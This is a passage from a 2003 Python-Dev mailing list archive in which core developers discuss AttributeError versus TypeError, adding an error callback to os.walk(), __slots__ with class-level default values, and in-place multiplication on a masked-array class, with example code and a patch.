Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: "Your message of Mon, 12 May 2003 20:34:21 EDT."
 <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
References: <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
Message-ID: <200305130144.h4D1ifq30620@pcp02138704pcs.reston01.va.comcast.net>

> How odd.  I was going to say the reverse; that I *always* want to 
> distinguish between the two, because TypeError almost invariably is a 
> programming error of some kind, while AttributeError is nearly always an 
> error that I'm checking in order to have a fallback.  E.g.:
> 
> try:
>     foo = thingy.foo
> except AttributeError:
>     pass    # handle the default case here
> else:
>     foo()
> 
> However, if 'thingy.foo' were to raise any other kind of error, such as a 
> TypeError, it'd probably mean that thingy had a broken 'foo' descriptor 
> that I'd want to know about.

This sounds like a much more advanced use, typical to a certain style
of programming. Others would do this using hasattr() or three-argument
getattr(); some will argue that you should have a base class that
handles the default case so you don't need to handle that case
separately at all (though that may not always be possible, e.g. when
dealing with objects created by a 3rd party library).

Your example argues for allowing to distinguish between
AttributeError and TypeError, but doesn't convince me that they are
totally different beasts.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From pje@telecommunity.com  Tue May 13 04:02:24 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Mon, 12 May 2003 23:02:24 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <200305130144.h4D1ifq30620@pcp02138704pcs.reston01.va.comca
 st.net>
References: <"Your message of Mon, 12 May 2003 20:34:21 EDT." <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
 <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
Message-ID: <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com>

At 09:44 PM 5/12/03 -0400, Guido van Rossum wrote:

>This sounds like a much more advanced use, typical to a certain style
>of programming.

Framework programming, for maximal adaptability of third-party code, yes.


>Others would do this using hasattr() or three-argument
>getattr()

I use three-argument getattr() most of the time, actually.  However, 
doesn't 'getattr()' rely on catching AttributeError?  I just wanted my 
example to be explicit.


>Your example argues for allowing to distinguish between
>AttributeError and TypeError, but doesn't convince me that they are
>totally different beasts.

Sure.  My point is more that using exceptions to indicate failed lookups is 
a tricky business.

I almost wish there was a way to declare the "normal" exceptions raised by 
an operation; or perhaps to easily query where an exception was raised.

Nowadays, when designing interfaces that need to signal some kind of 
exceptional condition, I tend to want to have them return sentinel values 
rather than raise exceptions, in order to distinguish between "failed" and 
"broken".

I'm sure that this is an issue specific to framework programming and to 
large team-built systems, though, and not something that bothers the 
mythical "average developer" a bit.  :)



From tanzer@swing.co.at  Tue May 13 06:33:27 2003
From: tanzer@swing.co.at (Christian Tanzer)
Date: Tue, 13 May 2003 07:33:27 +0200
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: Your message of "Tue, 13 May 2003 10:00:00 +1000."
 <338366A6D2E2CA4C9DAEAE652E12A1DE57F1E2@au3010avexu1.global.avaya.com>
Message-ID: <E19FSPn-0003kn-00@tswings.swing.cluster>

"Delaney, Timothy C (Timothy)" <tdelaney@avaya.com> wrote:

> > From: Guido van Rossum [mailto:guido@python.org]
> >
> > OTOH there's something to say for fewer errors, not more;
> > e.g. sometimes I wish AttributeError and TypeError were unified,
> > because AttributeError usually means that an object isn't of the
> > expected type.
>
> Hmm ... I was going to ask if there was any reason not to make
> AttributeError a subclass of TypeError, but that would mean that code
> like:
>
>     try:
>         ...
>     except TypeError:
>         ...
>
> would also catch all AttributeErrors.
>
> Maybe we should have a __future__ directive and phase it in starting
> in 2.4?
>
> I wouldn't suggest making AttributeError and TypeError be synonyms
> though ... I think it is useful to distinguish the situations.
>
> I can't think of any case in *my* code where I would want to
> distinguish between a TypeError and an AttributeError - usually I end
> up having:
>
>     try:
>         ...
>     except (TypeError, AttributeError):
>         ...

More hmmm...

Just grepped over my source tree (1293 .py files, ~ 300000 lines):

- 45 occurrences of `except AttributeError` with no mention of
  `TypeError`

- 16 occurrences of `except TypeError` with no mention of
  `AttributeError`

- 3 occurrences of `except (AttributeError, TypeError)`

Works well enough for me.

Deriving both AttributeError and TypeError from a common base would
make sense to me. Merging them wouldn't.

PS: As that was my first post here, a short introduction. I'm a
    consultant using Python since early 1998. Since then the
    precentage of C/C++ use in my daily work steadily shrank.
    Nowadays, using C normally means generating C code from Python.

-- 
Christian Tanzer                                         tanzer@swing.co.at



From mrussell@verio.net  Tue May 13 10:52:43 2003
From: mrussell@verio.net (Mark Russell)
Date: Tue, 13 May 2003 10:52:43 +0100
Subject: [Python-Dev] os.walk() silently ignores errors
Message-ID: <E19FWSr-0000jb-00@straylight>

I've just noticed that os.walk() silently skips unreadable directories.  I 
think this is surprising behaviour, which at least should be documented (there 
is a comment explaining this in the source, but nothing in the doc string).  Is it 
too late to add an optional callback argument to handle unreadable 
directories, so the caller could log them, raise an exception or whatever?  I 
think the default behaviour should still be to silently ignore them, but it 
would be nice to have a way to override it.
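
Roughly the idea, as a from-scratch sketch using os.listdir (not a patch to
os.walk itself):

import os
from os.path import join, isdir, islink

def walk_with_errors(top, onerror=None):
    # Like os.walk, but unreadable directories are reported through the
    # optional 'onerror' callback instead of being silently skipped.
    try:
        names = os.listdir(top)
    except OSError, err:
        if onerror is not None:
            onerror(err)
        return
    dirs = [name for name in names if isdir(join(top, name))]
    nondirs = [name for name in names if not isdir(join(top, name))]
    yield top, dirs, nondirs
    for name in dirs:
        path = join(top, name)
        if not islink(path):
            for result in walk_with_errors(path, onerror):
                yield result

The callback could log the directory, collect it in a list, or simply
re-raise the error.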

Mark Russell





From Raymond Hettinger" <python@rcn.com  Tue May 13 14:23:49 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Tue, 13 May 2003 09:23:49 -0400
Subject: [Python-Dev] __slots__ and default values
Message-ID: <000601c31954$728e9500$32b02c81@oemcomputer>

Was there a reason that __slots__ makes initialized
variables read-only?  It would be useful to have
overridable default values (even if it entailed copying
them into an instance's slots):

class Pane(object):
    __slots__ = ('background', 'foreground', 'size', 'content')
    background = 'black'
    foreground = 'white'
    size = (80, 25)

p = Pane()
p.background = 'light blue'     # override the default
assert p.foreground == 'white' # other defaults still in-place



Raymond Hettinger
    




---------------------------

>>> class A(object):
 __slots__ = ('x',)
 x = 1
 
>>> class B(object):
 __slots__ = ('x',)

>>> A().x = 2
Traceback (most recent call last):
  File "<pyshell#6>", line 1, in ?
    A().x = 2
AttributeError: 'A' object attribute 'x' is read-only
>>> B().x = 2


From guido@python.org  Tue May 13 14:51:33 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 09:51:33 -0400
Subject: [Python-Dev] os.walk() silently ignores errors
In-Reply-To: Your message of "Tue, 13 May 2003 10:52:43 BST."
 <E19FWSr-0000jb-00@straylight>
References: <E19FWSr-0000jb-00@straylight>
Message-ID: <200305131351.h4DDpXG30768@odiug.zope.com>

> I've just noticed that os.walk() silently skips unreadable
> directories.  I think this is surprising behaviour, which at least
> should be documented (there is a comment explaining this in the source,
> but nothing in the doc string).  Is it too late to add an optional
> callback argument to handle unreadable directories, so the caller
> could log them, raise an exception or whatever?  I think the default
> behaviour should still be to silently ignore them, but it would be
> nice to have a way to override it.

Ignoring is definitely the right thing to do by default, as otherwise
the existence of a single unreadable directory would cause your entire
walk to fail.  What's your use case for wanting to do something else?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Tue May 13 14:57:46 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 09:57:46 -0400
Subject: [Python-Dev] __slots__ and default values
In-Reply-To: Your message of "Tue, 13 May 2003 09:23:49 EDT."
 <000601c31954$728e9500$32b02c81@oemcomputer>
References: <000601c31954$728e9500$32b02c81@oemcomputer>
Message-ID: <200305131357.h4DDvkJ31195@odiug.zope.com>

> Was there a reason that __slots__ makes initialized
> variables read-only?  It would be useful to have
> overridable default values (even if it entailed copying
> them into an instance's slots):
> 
> class Pane(object):
>     __slots__ = ('background', 'foreground', 'size', 'content')
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
> 
> p = Pane()
> p.background = 'light blue'     # override the default
> assert p.foreground == 'white' # other defaults still in-place

You can't do that.  The class variable 'background' overrides the
descriptor created by __slots__.  background now appears read-only
because there is no instance dict.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jacobs@penguin.theopalgroup.com  Tue May 13 15:07:45 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Tue, 13 May 2003 10:07:45 -0400 (EDT)
Subject: [Python-Dev] __slots__ and default values
In-Reply-To: <000601c31954$728e9500$32b02c81@oemcomputer>
Message-ID: <Pine.LNX.4.44.0305130956030.12864-100000@penguin.theopalgroup.com>

On Tue, 13 May 2003, Raymond Hettinger wrote:
> Was there a reason that __slots__ makes initialized
> variables read-only?  It would be useful to have
> overridable default values (even if it entailed copying
> them into an instance's slots):
> 
> class Pane(object):
>     __slots__ = ('background', 'foreground', 'size', 'content')
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
> 
> p = Pane()
> p.background = 'light blue'     # override the default
> assert p.foreground == 'white' # other defaults still in-place

Those attributes are read-only because there is a name collision between
the slot descriptors and the class variables 'background' and 'foreground',
and the class favors the class variables.  Thus, no usable slots remain for
'background' and 'foreground', so the instance, not having an instance
dictionary, correctly reports that those attributes are indeed read-only.

Also, slots are not automatically initialized from class variables, though
one can easily write a metaclass to do so.  (Actually, it is only easy for a
first approximation, it is actually quite tricky to get 100% correct.)
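
A rough first approximation (the 'slot_defaults' name is made up, and it
ignores inheritance and other corner cases):

class SlotDefaults(type):
    # Copy class-level defaults into each new instance's slots, so the
    # defaults can be overridden per instance.
    def __call__(cls, *args, **kwds):
        obj = super(SlotDefaults, cls).__call__(*args, **kwds)
        for name, value in getattr(cls, 'slot_defaults', {}).items():
            if not hasattr(obj, name):     # don't clobber __init__'s work
                setattr(obj, name, value)
        return obj

class Pane(object):
    __metaclass__ = SlotDefaults
    __slots__ = ('background', 'foreground', 'size', 'content')
    slot_defaults = {'background': 'black',
                     'foreground': 'white',
                     'size': (80, 25)}

p = Pane()
p.background = 'light blue'        # override the default
assert p.foreground == 'white'     # other defaults still in place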

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com



From aahz@pythoncraft.com  Tue May 13 15:17:19 2003
From: aahz@pythoncraft.com (Aahz)
Date: Tue, 13 May 2003 10:17:19 -0400
Subject: [Python-Dev] __slots__ and default values
In-Reply-To: <000601c31954$728e9500$32b02c81@oemcomputer>
References: <000601c31954$728e9500$32b02c81@oemcomputer>
Message-ID: <20030513141719.GA12321@panix.com>

On Tue, May 13, 2003, Raymond Hettinger wrote:
>
> Was there a reason that __slots__ makes initialized variables
> read-only?  It would be useful to have overridable default values
> (even if it entailed copying them into an instance's slots):
>
> class Pane(object):
>     __slots__ = ('background', 'foreground', 'size', 'content')
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
> 
> p = Pane()
> p.background = 'light blue'     # override the default
> assert p.foreground == 'white' # other defaults still in-place

Why not do the initializing in __init__?
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From jeremy@zope.com  Tue May 13 15:40:39 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 13 May 2003 10:40:39 -0400
Subject: [Python-Dev] Need some patches checked
In-Reply-To: <200305120020.h4C0KIm29011@pcp02138704pcs.reston01.va.comcast.net>
References: <3EBEDDE0.3040308@ocf.berkeley.edu>
 <200305120020.h4C0KIm29011@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1052836839.973.6.camel@slothrop.zope.com>

On Sun, 2003-05-11 at 20:20, Guido van Rossum wrote:
> > Since I am trying to tackle patches that were not written by me for the 
> > first time I need someone to check that I am doing the right thing.

There are a bunch of open bugs and patches for urllib2.  I've cleaned up
a few things lately.  We might make a concerted effort to close them all
for 2.3b2.  Wholesale refactoring can be more effective than a large
set of small fixes.

Jeremy




From harri.pasanen@trema.com  Tue May 13 16:06:27 2003
From: harri.pasanen@trema.com (Harri Pasanen)
Date: Tue, 13 May 2003 17:06:27 +0200
Subject: [Python-Dev] os.walk() silently ignores errors
In-Reply-To: <200305131351.h4DDpXG30768@odiug.zope.com>
References: <E19FWSr-0000jb-00@straylight> <200305131351.h4DDpXG30768@odiug.zope.com>
Message-ID: <200305131706.27202.harri.pasanen@trema.com>

On Tuesday 13 May 2003 15:51, Guido van Rossum wrote:
> > I've just noticed that os.walk() silently skips unreadable
> > directories.  I think this is surprising behaviour, which at
> > least should be documented (there is a comment explaining this is
> > source, but nothing in the doc string).  Is it too late to add an
> > optional callback argument to handle unreadable directories, so
> > the caller could log them, raise an exception or whatever?  I
> > think the default behaviour should still be to silently ignore
> > them, but it would be nice to have a way to override it.
>
> Ignoring is definitely the right thing to do by default, as
> otherwise the existence of a single unreadable directory would
> cause your entire walk to fail.  What's your use case for wanting
> to do something else?

Sometimes I'm looking for something in the files of a directory tree, 
forgetting that I don't have access permissions to a particular 
subdirectory by default.  So the search can silently fail, and I'm 
left with the wrong idea that what I was looking for is not there.

Ideally, I'd like the possibility to have my script remind me to login as 
root prior to running it.

I know I could do some defensive programming in the walker function to 
work around this, but that would likely imply more stat calls and 
impact performance.

I've been bitten by this a couple of times, so I thought I'd pipe in.  

-Harri


From duncan@rcp.co.uk  Tue May 13 16:20:30 2003
From: duncan@rcp.co.uk (Duncan Booth)
Date: Tue, 13 May 2003 16:20:30 +0100
Subject: [Python-Dev] __slots__ and default values
References: <000601c31954$728e9500$32b02c81@oemcomputer> <20030513141719.GA12321@panix.com>
Message-ID: <Xns937AA5DBF878Aduncanrcpcouk@127.0.0.1>

Aahz <aahz@pythoncraft.com> wrote in news:20030513141719.GA12321@panix.com:

> On Tue, May 13, 2003, Raymond Hettinger wrote:
>>
>> Was there a reason that __slots__ makes initialized variables
>> read-only?  It would be useful to have overridable default values
>> (even if it entailed copying them into an instance's slots):
>>
>> class Pane(object):
>>     __slots__ = ('background', 'foreground', 'size', 'content')
>>     background = 'black'
>>     foreground = 'white'
>>     size = (80, 25)
>> 
>> p = Pane()
>> p.background = 'light blue'     # override the default
>> assert p.foreground == 'white' # other defaults still in-place
> 
> Why not do the initializing in __init__?

The following works, but I can't remember whether you're supposed to be 
able to use a dict in __slots__ or if it just happens to be allowed:

>>> class Pane(object):
	__slots__ = { 'background': 'black', 'foreground': 'white',
		      'size': (80, 25) }
	def __init__(self):
		for k, v in self.__slots__.iteritems():
			setattr(self, k, v)

			
>>> p = Pane()
>>> p.background = 'blue'
>>> p.background, p.foreground
('blue', 'white')
>>> 

-- 
Duncan Booth                                             duncan@rcp.co.uk
int month(char *p){return(124864/((p[0]+p[1]-p[2]&0x1f)+1)%12)["\5\x8\3"
"\6\7\xb\1\x9\xa\2\0\4"];} // Who said my code was obscure?


From mcherm@mcherm.com  Tue May 13 16:25:18 2003
From: mcherm@mcherm.com (Michael Chermside)
Date: Tue, 13 May 2003 08:25:18 -0700
Subject: [Python-Dev] Re: __slots__ and default values
Message-ID: <1052839518.3ec10e5e3f7c0@mcherm.com>

Raymond Hettinger wrote:
> class Pane(object):
>     __slots__ = ('background', 'foreground', 'size', 'content')
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
...which doesn't work since the class variable overwrites the
__slots__ descriptor.


Aahz replies:
> Why not do the initializing in __init__?

I presume that Raymond's concern was not that there wouldn't be
a way to do initialization, but that this would become a new c.l.p
FAQ and point of confusion for newbies. Unfortunately, I fear
that it will. Already I am seeing that people are "discovering"
class variables as a sort of "initialized instance variable"
instead of using __init__ as they "ought" to. Of course, it's NOT
an initialized instance variable, but newbies stumble across it
and seem to prefer it to using __init__.

Combine this with the fact that newbies from statically typed 
languages tend to think of __slots__ as "practically mandatory" 
(because it prevents the use of instance variables not pre-declared,
which they erroneously think is a good thing) rather than the 
special-purpose performance hack that it REALLY is, and you have
a recipe for trouble.

I'm not quite sure how to present things so as to steer them
right, but there's definitely a potential pitfall here.

-- Michael Chermside



From aleax@aleax.it  Tue May 13 16:29:54 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 13 May 2003 17:29:54 +0200
Subject: [Python-Dev] os.walk() silently ignores errors
In-Reply-To: <200305131706.27202.harri.pasanen@trema.com>
References: <E19FWSr-0000jb-00@straylight> <200305131351.h4DDpXG30768@odiug.zope.com> <200305131706.27202.harri.pasanen@trema.com>
Message-ID: <200305131729.54759.aleax@aleax.it>

On Tuesday 13 May 2003 05:06 pm, Harri Pasanen wrote:
   ...
> > Ignoring is definitely the right thing to do by default, as
> > otherwise the existence of a single unreadable directory would
> > cause your entire walk to fail.  What's your use case for wanting
> > to do something else?
>
> Sometimes I'm looking for something in a files in directory tree,
> forgetting I don't have access permissions to a particular
> subdirectory by default.  So the search can silently fail, and I'm
> left with the wrong idea that what I was looking is not there.
>
> Ideally, I'd like the possibility have my script remind me to login as
> root prior to running it.

Seconded!  The default of ignoring errors is just fine, but it WOULD
be nice to optionally get a callback on errors so as to be able to
raise warnings or exceptions.  "Errors should never pass silently
unless explicitly silenced" would argue for stronger diagnostic
behavior, but compatibility surely constrains the default behavior --
BUT, an easy way to get non-silent behavior would be something
I'd end up using, roughly, in 50% of my tree-walking scripts.


Alex



From mrussell@verio.net  Tue May 13 16:40:07 2003
From: mrussell@verio.net (Mark Russell)
Date: Tue, 13 May 2003 16:40:07 +0100
Subject: [Python-Dev] os.walk() silently ignores errors
In-Reply-To: Your message of "Tue, 13 May 2003 09:59:01 EDT."
 <20030513135901.5867.87468.Mailman@mail.python.org>
Message-ID: <E19Fbst-0001bt-00@straylight>

>Ignoring is definitely the right thing to do by default, as otherwise
>the existence of a single unreadable directory would cause your entire
>walk to fail.  What's your use case for wanting to do something else?

I was using os.walk() to copy a directory tree with some modifications - I
assumed that as no exceptions had been raised the tree had been copied
successfully.  It was only when I diffed the original and copy trees that I
found some directories had been skipped because they were unreadable.
Had I not checked I would have silently lost data - not behaviour I expect
from a python script :-)

Mark




From guido@python.org  Tue May 13 16:40:53 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 11:40:53 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: Your message of "Mon, 12 May 2003 23:02:24 EDT."
 <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com>
References: <"Your message of Mon, 12 May 2003 20:34:21 EDT." <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com> <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
 <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com>
Message-ID: <200305131540.h4DFerS05699@odiug.zope.com>

How about this patch?

Index: os.py
===================================================================
RCS file: /cvsroot/python/python/dist/src/Lib/os.py,v
retrieving revision 1.70
diff -c -c -r1.70 os.py
*** os.py	25 Apr 2003 07:11:48 -0000	1.70
--- os.py	13 May 2003 15:40:21 -0000
***************
*** 203,209 ****
  
  __all__.extend(["makedirs", "removedirs", "renames"])
  
! def walk(top, topdown=True):
      """Directory tree generator.
  
      For each directory in the directory tree rooted at top (including top
--- 203,209 ----
  
  __all__.extend(["makedirs", "removedirs", "renames"])
  
! def walk(top, topdown=True, onerror=None):
      """Directory tree generator.
  
      For each directory in the directory tree rooted at top (including top
***************
*** 232,237 ****
--- 232,243 ----
      dirnames have already been generated by the time dirnames itself is
      generated.
  
+     By default errors from the os.listdir() call are ignored.  If
+     optional arg 'onerror' is specified, it should be a function;
+     it will be called with one argument, an exception instance.  It
+     can report the error to continue with the walk, or raise the
+     exception to abort the walk.
+ 
      Caution:  if you pass a relative pathname for top, don't change the
      current working directory between resumptions of walk.  walk never
      changes the current directory, and assumes that the client doesn't
***************
*** 259,265 ****
          # Note that listdir and error are globals in this module due
          # to earlier import-*.
          names = listdir(top)
!     except error:
          return
  
      dirs, nondirs = [], []
--- 265,273 ----
          # Note that listdir and error are globals in this module due
          # to earlier import-*.
          names = listdir(top)
!     except error, err:
!         if onerror is not None:
!             onerror(err)
          return
  
      dirs, nondirs = [], []
***************
*** 274,280 ****
      for name in dirs:
          path = join(top, name)
          if not islink(path):
!             for x in walk(path, topdown):
                  yield x
      if not topdown:
          yield top, dirs, nondirs
--- 282,288 ----
      for name in dirs:
          path = join(top, name)
          if not islink(path):
!             for x in walk(path, topdown, onerror):
                  yield x
      if not topdown:
          yield top, dirs, nondirs
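
With that in place, a caller could do something like this (just a sketch
of how the proposed 'onerror' argument might be used; the callback name
is made up):

    import os, sys

    def note_error(err):
        # err is the os.error raised by listdir(); report it, keep walking
        print >> sys.stderr, "skipped: %s" % err

    for root, dirs, files in os.walk('/some/tree', onerror=note_error):
        pass  # process root, dirs, files as usual; raising inside
              # note_error would abort the walk instead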

--Guido van Rossum (home page: http://www.python.org/~guido/)


From theller@python.net  Tue May 13 16:45:34 2003
From: theller@python.net (Thomas Heller)
Date: 13 May 2003 17:45:34 +0200
Subject: [Python-Dev] Re: __slots__ and default values
In-Reply-To: <1052839518.3ec10e5e3f7c0@mcherm.com>
References: <1052839518.3ec10e5e3f7c0@mcherm.com>
Message-ID: <y91au9y9.fsf@python.net>

Michael Chermside <mcherm@mcherm.com> writes:

> Combine this with the fact that newbies from staticly typed 
> languages tend to think of __slots__ as "practically mandatory" 
> (because it prevents the use of instance variables not pre-declared,
> which they erroniously think is a good thing) rather than the 
> special purpose performance hack that it REALLY is, and you have
> a recipe for trouble.

Unrelated to *this* topic, but Andrew's "What's new in Python 2.2" still
presents __slots__ as a way to constrain the instance variables:

  A new-style class can define a class attribute named __slots__ to
  constrain the list of legal attribute names.

http://www.python.org/doc/current/whatsnew/sect-rellinks.html#SECTION000340000000000000000

This should probably be fixed.

Thomas



From walter@livinglogic.de  Tue May 13 17:14:51 2003
From: walter@livinglogic.de (=?ISO-8859-15?Q?Walter_D=F6rwald?=)
Date: Tue, 13 May 2003 18:14:51 +0200
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <200305131540.h4DFerS05699@odiug.zope.com>
References: <"Your message of Mon, 12 May 2003 20:34:21 EDT." <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com> <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>              <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com> <200305131540.h4DFerS05699@odiug.zope.com>
Message-ID: <3EC119FB.5000302@livinglogic.de>

Guido van Rossum wrote:

> How about this patch?

I like the increased flexibility. But how about the following
version?

---
def walk(top, order=".d", recursive=True, onerror=None):
    from os.path import join, isdir, islink, normpath
    try:
       names = listdir(top)
    except error, err:
       if onerror is not None:
          onerror(err)
       return

    dirs, nondirs = [], []
    for name in names:
       if isdir(join(top, name)):
          dirs.append(name)
       else:
          nondirs.append(name)

    for c in order:
       if c==".":
          yield top, dirs, nondirs
       elif c=="f":
          for nd in nondirs:
             yield normpath(join(top, nd)), [], []
       elif c=="d":
          for name in dirs:
             path = join(top, name)
             if not islink(path):
                if recursive:
                   for x in walk(path, order, recursive, onerror):
                      yield (normpath(x[0]), x[1], x[2])
                else:
                   yield path
       else:
          raise ValueError, "unknown order %r" % c
---
It combines recursive and non-recursive walks, topdown and bottomup
walks, walks with and without files or directories.

E.g. Getting a list of all files, topdown:
    [x[0] for x in os.walk(top, order="fd")]
or a list of directories bottom up:
    [x[0] for x in os.walk(top, order="d.")]
or a list of files and directories, topdown, with
files before subdirectories:
    [x[0] for x in os.walk(top, order=".fd")]

Bye,
    Walter Dörwald




From walter@livinglogic.de  Tue May 13 17:36:18 2003
From: walter@livinglogic.de (=?ISO-8859-15?Q?Walter_D=F6rwald?=)
Date: Tue, 13 May 2003 18:36:18 +0200
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <200305131620.h4DGKMi08267@odiug.zope.com>
References: <"Your message of Mon, 12 May 2003 20:34:21 EDT." <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com> <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com> <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com> <200305131540.h4DFerS05699@odiug.zope.com>              <3EC119FB.5000302@livinglogic.de> <200305131620.h4DGKMi08267@odiug.zope.com>
Message-ID: <3EC11F02.2060301@livinglogic.de>

Guido van Rossum wrote:

 >> I like the increased flexibility. But how about the following
 >> version?
 >
 >
 > I don't think there's any need for such increased flexibility.  Let's
 > stop while we're ahead.  Fixing the silent errors case is important
 > (see various posts here).  Your generalization is a YAGNI though.

True, getting a list of files in the current directory even works
with the current os.walk:

sum([[os.path.join(x[0], f) for f in x[2]] for x in os.walk(".")], [])

Bye,
    Walter Dörwald





From tim@zope.com  Tue May 13 18:19:48 2003
From: tim@zope.com (Tim Peters)
Date: Tue, 13 May 2003 13:19:48 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <3EC11F02.2060301@livinglogic.de>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOELKFKAA.tim@zope.com>

[Walter Dörwald]
> True, getting a list of files in the current directory even works
> with the current os.walk:
>
> sum([[os.path.join(x[0], f) for f in x[2]] for x in os.walk(".")], [])

Convoluted one-liners are poor Python style, IMO.  That walks the entire
tree, too.  If you want the files in just the current directory,

    for root, dirs, files in os.walk('.'):
        break
    print files

or if clarity is disturbing <wink>:

    files = os.walk('.').next()[-1]



From paul@pfdubois.com  Tue May 13 18:25:38 2003
From: paul@pfdubois.com (Paul Dubois)
Date: Tue, 13 May 2003 10:25:38 -0700
Subject: [Python-Dev] Inplace multiply
Message-ID: <000401c31974$ac31c730$6801a8c0@NICKLEBY>

My "masked array" class MA has a problem that I don't know how to solve. The
inplace multiply function

    def __imul__ (self, other)

is not getting called, while my other inplace operations do work. The scenario
is

x = MA.array(...)

x *= c

If c is an int, this works correctly, calling MA.__imul__. Otherwise, I get
a message from the Python runtime saying it can't multiply a sequence by a
non-int. But change MA to Numeric, it works.

Numeric is an extension type and MA is a (new style) class. MA defines
__len__ as well as all the math operators.



From guido@python.org  Tue May 13 18:44:37 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 13:44:37 -0400
Subject: [Python-Dev] Inplace multiply
In-Reply-To: Your message of "Tue, 13 May 2003 10:25:38 PDT."
 <000401c31974$ac31c730$6801a8c0@NICKLEBY>
References: <000401c31974$ac31c730$6801a8c0@NICKLEBY>
Message-ID: <200305131744.h4DHibn13549@odiug.zope.com>

> My "masked array" class MA has a problem that I don't know how to solve. The
> inplace multiply function
> 
>     def __imul__ (self, other)
> 
> is not getting called, while my other inplace operations do work. The scenario
> is
> 
> x = MA.array(...)
> 
> x *= c
> 
> If c is an int, this works correctly, calling MA.__imul__. Otherwise, I get
> a message from the Python runtime saying it can't multiply a sequence by a
> non-int. But change MA to Numeric, it works.
> 
> Numeric is an extension type and MA is a (new style) class. MA defines
> __len__ as well as all the math operators.

We won't be able to help without seeing your code.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler@unpythonic.net  Tue May 13 19:31:45 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 13 May 2003 13:31:45 -0500
Subject: [Python-Dev] Inplace multiply
In-Reply-To: <000401c31974$ac31c730$6801a8c0@NICKLEBY>
References: <000401c31974$ac31c730$6801a8c0@NICKLEBY>
Message-ID: <20030513183144.GH11289@unpythonic.net>

There must be something more to your problem than what you described.

The following executes just fine for me (ditto if NewKoke is a subclass
of object instead of list, and no matter whether I define __getitem__ or
not [a guess based on your remark about 'multiply a sequence']):

$ python dubois.py
sausages vegetable-style breakfast patty
sausages vegetable-style breakfast patty

class Klassic:
    def __imul__(self, other):
        return "sausages"
    def __getitem__(self, i): return None

class NewKoke(list):
    def __imul__(self, other):
        return "vegetable-style breakfast patty"
    def __getitem__(self, i): return None

k = Klassic()
o = NewKoke()

k *= 1
o *= 1

print k, o

k = Klassic()
o = NewKoke()

k *= "spam"
o *= "spam"

print k, o


From tim.one@comcast.net  Tue May 13 20:03:58 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 13 May 2003 15:03:58 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <E19FSPn-0003kn-00@tswings.swing.cluster>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEMGFKAA.tim.one@comcast.net>

[Christian Tanzer]
> More hmmm...
>
> Just grepped over my source tree (1293 .py files, ~ 300000 lines):
>
> - 45 occurrences of `except AttributeError` with no mention of
>   `TypeError`
>
> - 16 occurrences of `except TypeError` with no mention of
>   `AttributeError`
>
> - 3 occurrences of `except (AttributeError, TypeError)`
>
> Works well enough for me.

With a fixed release of Python, it would be hard not to work well enough.  I
have to point out, though, that *across* Python releases, a frequent kind of
patch made to the Python test suite is changing former TypeError occurrences
to AttributeError, or vice versa.  I'm not sure which direction is most
common overall, and it's often unclear which is more appropriate.  For
example,

>>> d = {}
>>> d.update('abc')
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: keys
>>>

I wouldn't be surprised if that changed to TypeError someday.

> Deriving both AttributeError and TypeError from a common base would
> make sense to me. Merging them wouldn't.

Yes -- and we should derive all exceptions from LookupError <wink>.



From tjreedy@udel.edu  Tue May 13 20:12:50 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Tue, 13 May 2003 15:12:50 -0400
Subject: [Python-Dev] Re: Inplace multiply
